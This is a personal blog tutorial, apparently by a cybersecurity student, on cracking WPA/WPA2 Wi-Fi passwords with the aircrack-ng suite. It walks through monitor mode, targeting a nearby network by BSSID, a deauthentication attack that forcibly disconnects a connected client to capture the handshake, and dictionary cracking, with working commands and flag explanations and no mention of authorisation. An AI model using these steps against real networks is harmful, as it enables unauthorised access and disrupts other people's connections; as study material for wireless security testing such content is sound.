WPA/WPA2 WIFI Cracking
Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program, this is my first blog and I want to share some of my learnings with you about common WPA/WPA2 attacks and how to crack any WPA or WPA2 Wi-Fi considering you have the Dictionary for it to crack the WPA handshake.
Without any more delay lets start the fun stuff and get our hands dirty. First of all you need to Setup you Wi-Fi adapter and open Kali Terminal to verify if the adapter is setup or not with the command
iwconfig
As we see here our Wi-Fi adapter is setup and working fine, now we have to first kill the process which are running and can create disturbance in the attack with the following command
airmon-ng check kill
After the pre-checks are over we can start the attack . First we have to put the Wi-Fi adapter in monitor mode with the command
airmon-ng start wlan0
As you can see we are in monitor mode now and can monitor the packets flowing on the Wi-Fi Network. After getting the adapter in monitor mode its time to start monitoring the network about how many Wi-Fi are there in the surrounding area and then select our target and try to capture WPA handshake on them. To start monitoring the network we will use the command
airodump-ng wlan0
where wlan0 is the network interface on which we want to monitor
After starting the monitor mode on the network interface your screen should look like this where -
BSSID means MAC address of Access Point.
PWR means the intensity of the signal.
Beacons means no of Announcement Packet's send by Access Point.
Data means no of captured packets.
#/s means no of data packets per second over interval of 10 secs.
MB means maximum speed supported by Access Point.
ENC means encryption used.
CIPHER means cipher detected by the Adapter.
AUTH means the Authentication protocol in use.
ESSID states the name of Wi-Fi network.
After understanding what every field is we can now go ahead with our attack .We need a target among these networks which we want to attack specifically and crack. So in this case our target is the First Wi-Fi network in table with ESSID FTTxJBNET9911155022.
We will now attack this specific network and try to get a WPA handshake
airodump-ng wlan0 — bssid 38:94:XX:XX:XX:XX -c 4 — write wifi.cap
As you see here there are different Clients connected to this Wi-Fi Network under STATION and in order to capture a WPA Handshake we need a new client to connect to this network so that we can capture the packets and crack it. But there is one problem as we could have to wait for longer periods of time in wait for someone new to connect or for any existing client to reconnect. But most of the time we don't have the liberty to waste so much time waiting and due to this scenario we would have to improvise.
Luckily for us there is a specific attack which can help us in solving the problem. This attack is know as De-Auth Attack and in this attack our aim is to kick one of the device connected to Network Forcefully by sending De-Auth packets to the Access Point which will think that the Packets are coming from the original device and will disconnect the device. Due to this the client will be confused why it was disconnected and will try to connect itself back and in this process of connecting back we will capture the WPA Handshake.
aireplay-ng -0 1 -a 38:94:XX:XX:XX:XX -c 2C:FD:XX:XX:XX:XX wlan0
Where:
- -0 means DE authentication
- 1 is the number of De-Auth packets to send (you can send multiple if you wish); 0 means send them continuously
- -a specifies the MAC address of the access point
- -c specifies the MAC address of the client to DE authenticate
As soon as we do this the Client will try to reconnect itself and we will see a WPA Handshake being Captured in the file wifi.cap.
As you see in the top right corner of image WPA handshake is captured. Now we will stop the attack with Control + C and check the file we have created with the name of wifi.cap.
Now we can use the created file to Crack the WPA Handshake and get the password. To crack the WPA handshake we will use another utility with name Aircrack-ng with the command
aircrack-ng wifi.cap-01.cap -w wordlist.txt
where
- -w wordlist.txt is the wordlist you want to use to crack the Handshake.
- wifi.cap-01.cap is the main capture file to crack
If the particular password is in the Wordlist you have given, then and then only the Brute-force attack will be successful and the time will vary on the key complexity, you now just have to wait and watch.
Congrats!! You have successfully cracked your Wi-Fi Password. Hope this blog helped you in successfully cracking your Wi-Fi password.
Thank you for reading this blog. Happy Hacking!!
